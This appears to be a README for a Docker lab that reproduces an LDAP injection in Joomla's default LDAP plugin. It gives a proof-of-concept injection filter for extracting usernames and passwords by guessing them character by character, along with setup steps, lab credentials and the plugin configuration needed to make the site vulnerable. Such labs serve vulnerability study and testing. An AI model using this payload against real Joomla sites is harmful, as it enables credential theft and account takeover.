A LDAP injection was discoverd by RISP, it can be used to burp the username and password of joomla if the default LDAP plugin was configured.
The poc looks like
XXX;!(|(!(uid=user*))(!(userPassword=password*)))
A presentation video can be found on twitter
Run
docker-compose upInstall joomla with
Host Name: mysql:3306
Database Name: joomla
Database Username: root
Database Password: root
After installation, delete the folder /var/www/html/plugins/quickicon/phpversionchecker in joomla container.
Login in with your admin account and enable default LDAP plugin, and configure as below
Host: openldap
Port: 1389
LDAP V3: Yes
Negotiate TLS: No
Follow Referrals: No
Authorisation Method: Bind and Search
Base DN: dc=example,dc=org
Search String: uid=[search]
User's DN: cn=[username],ou=users,dc=example,dc=org
Connect Username:
Connect Password:
Map: Full Name: fullName
Map: Email: mail
Map: User ID: uid
save and close it.
Now we need to create a new user in super Users groups with same name of our openldap server (but not same password), in this case it's user01.
After that, your can logout and try to burp the user01 and it password.